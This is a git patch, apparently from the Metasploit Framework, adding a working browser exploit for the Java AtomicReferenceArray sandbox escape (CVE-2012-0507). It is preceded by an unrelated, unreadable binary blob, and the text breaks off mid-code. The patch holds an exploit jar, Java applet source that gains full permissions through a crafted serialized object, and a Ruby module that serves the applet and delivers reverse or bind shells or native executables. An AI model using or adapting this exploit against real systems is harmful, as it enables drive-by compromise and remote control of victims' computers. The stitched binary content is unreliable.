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 Date: Thu, 29 Mar 2012 10:31:14 -0500 Subject: [PATCH 46/46] Add CVE-2012-0507 (Java) --- data/exploits/CVE-2012-0507.jar | Bin 0 -> 6944 bytes .../exploits/CVE-2012-0507/Exploit.java | 58 ++++++ .../source/exploits/CVE-2012-0507/Help.java | 82 +++++++++ .../browser/java_atomicreferencearray.rb | 173 ++++++++++++++++++ 4 files changed, 313 insertions(+) create mode 100644 data/exploits/CVE-2012-0507.jar create mode 100644 external/source/exploits/CVE-2012-0507/Exploit.java create mode 100644 external/source/exploits/CVE-2012-0507/Help.java create mode 100644 modules/exploits/multi/browser/java_atomicreferencearray.rb diff --git a/data/exploits/CVE-2012-0507.jar b/data/exploits/CVE-2012-0507.jar new file mode 100644 index 0000000000000000000000000000000000000000..e0c2d68188aa782f75ca6049153c5159bc8c61ad GIT binary patch literal 6944 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 J6!`n@zW`)iUNisz literal 0 HcmV?d00001 diff --git a/external/source/exploits/CVE-2012-0507/Exploit.java b/external/source/exploits/CVE-2012-0507/Exploit.java new file mode 100644 index 0000000000..3a1f899b9e --- /dev/null +++ b/external/source/exploits/CVE-2012-0507/Exploit.java @@ -0,0 +1,58 @@ +package a; + +import java.applet.Applet; +import java.io.ByteArrayInputStream; +import java.io.ObjectInputStream; +import java.util.concurrent.atomic.AtomicReferenceArray; +import a.*; + +// Referenced classes of package a: +// Help + +public class Exploit extends Applet +{ + + public Exploit() + { + } + + public static byte[] StringToBytes(String s) + { + byte abyte0[] = new byte[s.length() / 2]; + for(int i = 0; i < s.length(); i += 2) + abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16)); + + return abyte0; + } + + public void init() + { + try + { + String as[] = { + "ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003" + }; + StringBuilder stringbuilder = new StringBuilder(); + for(int i = 0; i < as.length; i++) + stringbuilder.append(as[i]); + + ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString()))); + Object aobj[] = (Object[])(Object[])objectinputstream.readObject(); + Help ahelp[] = (Help[])(Help[])aobj[0]; + AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1]; + ClassLoader classloader = getClass().getClassLoader(); + atomicreferencearray.set(0, classloader); + Help _tmp = ahelp[0]; + + String data = getParameter( "data" ); + String jar = getParameter( "jar" ); + String lhost = getParameter( "lhost" ); + String lport = getParameter( "lport" ); + System.out.println("go go go"); + Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) )); + } + catch(Exception exception) { + System.out.println(exception.getMessage()); + } + } +} diff --git a/external/source/exploits/CVE-2012-0507/Help.java b/external/source/exploits/CVE-2012-0507/Help.java new file mode 100644 index 0000000000..f340a77161 --- /dev/null +++ b/external/source/exploits/CVE-2012-0507/Help.java @@ -0,0 +1,82 @@ +package a; + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.io.Serializable; +import java.net.URL; +import java.security.AllPermission; +import java.security.CodeSource; +import java.security.Permissions; +import java.security.ProtectionDomain; +import java.security.cert.Certificate; +import java.lang.reflect.Field; + +public class Help extends ClassLoader implements Serializable{ + public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) { + + String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" }; + String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" }; + Class cls = null; + + try + { + for( int index=0 ; index 0 ) + bos.write( buffer, 0, length ); + // convert it to a simple byte array + buffer = bos.toByteArray(); + + URL url = new URL( "file:///" ); + + Certificate[] certs = new Certificate[0]; + + Permissions perm = new Permissions(); + perm.add( new AllPermission() ); + + ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm ); + + cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd ); + Class class_cls = cls.getClass(); + System.out.println("The type of the object is: " + class_cls.getName()); + } + + // cls will end up being the PayloadX class + if( cls != null ) + { + // reflect into the PayloadX class to get these three fields + Field payload_data = cls.getField( "data" ); + Field payload_jar = cls.getField( "jar" ); + Field payload_lhost = cls.getField( "lhost" ); + Field payload_lport = cls.getField( "lport" ); + + // instantiate the PayloadX object once so as we can set the native payload data + Object obj = cls.newInstance(); + + // set the native payload data, lhost and lport + payload_data.set( obj, data ); + payload_jar.set( obj, jar ); + payload_lhost.set( obj, lhost ); + payload_lport.setInt( obj, lport ); + + // instantiate a second PayloadX object to perform the actual payload + obj = cls.newInstance(); + } + } + catch( Exception e ) { + System.out.println(e.getMessage()); + } + } +} + diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb new file mode 100644 index 0000000000..1ce83d4457 --- /dev/null +++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb @@ -0,0 +1,173 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + def initialize( info = {} ) + + super( update_info( info, + 'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability due to the fact that + AtomicReferenceArray uses the Unsafe class to store a reference in an + array directly, which may violate type safety if not used properly. + This allows a way to escape the JRE sandbox, and load additional classes + in order to perform malicious operations. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'sinn3r', # metasploit module + 'juan vazquez' # metasploit module + ], + 'References' => + [ + ['CVE', '2012-0507'], + ['BID', '52161'], + ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'], + ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'] + ], + 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA, + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X PPC (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_PPC, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 14 2012' + )) + end + + + def exploit + # load the static jar file + path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" ) + fd = File.open( path, "rb" ) + @jar_data = fd.read(fd.stat.size) + fd.close + + super + end + + + def on_request_uri( cli, request ) + data = nil + host = nil + port = nil + peer = "#{cli.peerhost}:#{cli.peerport}" + + if not request.uri.match(/\.jar$/i) + if not request.uri.match(/\/$/) + send_redirect( cli, get_resource() + '/', '') + return + end + + print_status("#{peer} - Sending #{self.name}") + + payload = regenerate_payload( cli ) + if not payload + print_error("#{peer} - Failed to generate the payload." ) + return + end + + if target.name == 'Generic (Java Payload)' + if datastore['LHOST'] + jar = payload.encoded + host = datastore['LHOST'] + port = datastore['LPORT'] + vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" ) + else + port = datastore['LPORT'] + datastore['RHOST'] = cli.peerhost + vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." ) + end + if jar + print_status( "Generated jar to drop (#{jar.length} bytes)." ) + jar = Rex::Text.to_hex( jar, prefix="" ) + else + print_error("#{peer} - Failed to generate the executable." ) + return + end + else + + # NOTE: The EXE mixin automagically handles detection of arch/platform + data = generate_payload_exe + + if data + print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." ) + data = Rex::Text.to_hex( data, prefix="" ) + else + print_error("#{peer} - 